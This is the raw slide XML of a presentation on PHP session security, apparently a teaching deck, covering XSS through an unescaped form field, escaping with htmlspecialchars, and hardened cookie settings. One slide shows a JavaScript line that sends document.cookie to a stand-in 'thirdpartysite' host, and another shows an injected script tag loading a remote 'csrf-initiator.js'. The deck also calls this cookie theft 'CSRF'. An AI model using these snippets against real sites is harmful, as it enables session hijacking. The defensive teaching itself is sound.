            <a:ext cx="21971002" cy="1433165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr b="0" spc="-200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Thank you !</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="GitHub - https://github.com/polygoncoin…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010081" y="6270542"/>
            <a:ext cx="21971002" cy="192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2365187">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr spc="-77" sz="3492">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>polygon.co.in@gmail.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="2365187">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr spc="-77" sz="3492">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="2365187">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr spc="-77" sz="3492">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>https://github.com/polygoncoin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257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58" name="Ramesh N Jangid…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396664" y="11556026"/>
            <a:ext cx="21971002" cy="1220156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr b="0" sz="3600"/>
            </a:pPr>
            <a:r>
              <a:t>Ramesh N Jangid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr b="0" sz="2700"/>
            </a:pPr>
            <a:r>
              <a:t>M-Tech ChE IITK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="Credits…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091410" y="9120247"/>
            <a:ext cx="3582557" cy="2942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10000"/>
              </a:lnSpc>
              <a:defRPr b="1" u="sng"/>
            </a:pPr>
            <a:r>
              <a:t>Credits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600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2700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Raghav Rao</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600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2700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Nishant Asthana</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600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2700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Manish Deshpande</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600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2700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Ketan Thaker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Introduc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57" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="4223103"/>
            <a:ext cx="21971000" cy="82560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40000"/>
              </a:lnSpc>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>HTTP a stateless protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="40000"/>
              </a:lnSpc>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>PHP Session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="999744" indent="-499872" defTabSz="1999437">
              <a:lnSpc>
                <a:spcPct val="40000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Client side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1499616" indent="-499872" defTabSz="1999437">
              <a:lnSpc>
                <a:spcPct val="40000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Cross Site Scripting (XSS) - CSRF Example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1499616" indent="-499872" defTabSz="1999437">
              <a:lnSpc>
                <a:spcPct val="40000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Sanitising - Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1499616" indent="-499872" defTabSz="1999437">
              <a:lnSpc>
                <a:spcPct val="40000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Sanitising - CSRF cookie access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="999744" indent="-499872" defTabSz="1999437">
              <a:lnSpc>
                <a:spcPct val="40000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Server side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1499616" indent="-499872" defTabSz="1999437">
              <a:lnSpc>
                <a:spcPct val="40000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Required skills / stuff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1499616" indent="-499872" defTabSz="1999437">
              <a:lnSpc>
                <a:spcPct val="40000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Behaviour - Normal &amp; Read-only session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1499616" indent="-499872" defTabSz="1999437">
              <a:lnSpc>
                <a:spcPct val="40000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Benchmarking - Normal &amp; Read-only session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1499616" indent="-499872" defTabSz="1999437">
              <a:lnSpc>
                <a:spcPct val="40000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitising - scope of session attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158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159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162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163" name="Client side"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9446514" y="6137401"/>
            <a:ext cx="5490973" cy="1441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chemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Client side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ross Site Scripting (XSS) - CSRF Examp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Cross Site Scripting (XSS) - CSRF Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="6191603"/>
            <a:ext cx="21971000" cy="199798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5E5E5E"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>——PHP /handler——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5353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5E5E5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33333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Fullname: </a:t>
            </a:r>
            <a:r>
              <a:t>&lt;?php echo $_POST['fullname']; ?&gt;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5353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&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167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168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169" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="10823271"/>
            <a:ext cx="21971000" cy="115179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algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="A7A7A7"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>// code inside javascript file to access </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>non-sanitised</a:t>
            </a:r>
            <a:r>
              <a:t> cookies and send it to third-party - </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="007020"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window</a:t>
            </a:r>
            <a:r>
              <a:t>.location = "http://thirdpartysite" + "?cookies=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="007020"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encodeURIComponent</a:t>
            </a:r>
            <a:r>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="8474707"/>
            <a:ext cx="21971000" cy="199798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2700"/>
            </a:pPr>
            <a:r>
              <a:t>——Generated HTML——</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2700">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2700"/>
            </a:pPr>
            <a:r>
              <a:t>    Fullname: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type=</a:t>
            </a:r>
            <a:r>
              <a:t>“text/javascript” </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src=</a:t>
            </a:r>
            <a:r>
              <a:t>“http://somesite/csrf-initiator.js”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2700">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168400" y="3591000"/>
            <a:ext cx="21971000" cy="2386849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2700"/>
            </a:pPr>
            <a:r>
              <a:t>——HTML FORM——</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="2700">
                <a:solidFill>
                  <a:srgbClr val="5353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&lt;form action="/handler" method="POST"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="2700">
                <a:solidFill>
                  <a:srgbClr val="5353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&lt;input type="text" name="fullname" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="2700">
                <a:solidFill>
                  <a:srgbClr val="5353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&lt;input type="submit" name="submit" value="Submit" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="2700">
                <a:solidFill>
                  <a:srgbClr val="5353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&lt;/form&gt;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anitising - Cross Site Scripting (XSS)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Sanitising - Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="6852003"/>
            <a:ext cx="21971000" cy="199798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5E5E5E"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>——PHP /handler——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535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;p&gt;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5E5E5E"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Fullname: </a:t>
            </a:r>
            <a:r>
              <a:t>&lt;?php echo </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>htmlspecialchars ( </a:t>
            </a:r>
            <a:r>
              <a:t>$_POST[‘fullname’] </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:t>; ?&gt;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535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175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176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177" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="3568441"/>
            <a:ext cx="21971000" cy="3018101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80000"/>
              </a:lnSpc>
              <a:defRPr spc="-70" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr spc="-70" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr spc="-70" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>CSRF begins with the scope of Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr spc="-70" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr spc="-70" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Hence sanitise the XSS scope</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="9122407"/>
            <a:ext cx="21971000" cy="199798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2700"/>
            </a:pPr>
            <a:r>
              <a:t>——Generated HTML——</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2700">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2700"/>
            </a:pPr>
            <a:r>
              <a:t>    Fullname: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;lt;</a:t>
            </a:r>
            <a:r>
              <a:t>script type=“text/javascript” src=“http://somesite/csrf-initiator.js</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;quot;&amp;gt;&amp;lt;</a:t>
            </a:r>
            <a:r>
              <a:t>/script</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2700">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/p&gt;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anitising - CSRF cookie access option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Sanitising - CSRF cookie access option 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="3575403"/>
            <a:ext cx="10738391" cy="7443722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&lt;?php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// </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A7A7A7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Non-sanitised</a:t>
            </a:r>
            <a:endParaRPr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setcookie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</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$name</a:t>
            </a:r>
            <a:r>
              <a:t> = 'cookie_name',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</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$value</a:t>
            </a:r>
            <a:r>
              <a:t> = 'cookie_value',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</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$expires</a:t>
            </a:r>
            <a:r>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182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183" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12466898" y="3582509"/>
            <a:ext cx="10738392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/>
            </a:pPr>
            <a:r>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A7A7A7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitised</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>setcookie (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$name</a:t>
            </a:r>
            <a:r>
              <a:t> = 'cookie_name',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$value</a:t>
            </a:r>
            <a:r>
              <a:t> = 'cookie_value',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$expires</a:t>
            </a:r>
            <a:r>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$path</a:t>
            </a:r>
            <a:r>
              <a:t> = '/admin',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$domain</a:t>
            </a:r>
            <a:r>
              <a:t> = 'ramesh.com',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$secure</a:t>
            </a:r>
            <a:r>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$httponly</a:t>
            </a:r>
            <a:r>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184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anitising - CSRF cookie access option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Sanitising - CSRF cookie access option 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="3575403"/>
            <a:ext cx="10738391" cy="7443722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&lt;?php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// </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A7A7A7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitised</a:t>
            </a:r>
            <a:endParaRPr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setcookie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</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$name</a:t>
            </a:r>
            <a:r>
              <a:t> = 'cookie_name',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</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$value</a:t>
            </a:r>
            <a:r>
              <a:t> = 'cookie_value',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996633"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$options</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = [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    'expires' =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a: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    'path' =&gt; '/admin',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    'domain' =&gt; 'ramesh.com',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    'secure' =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
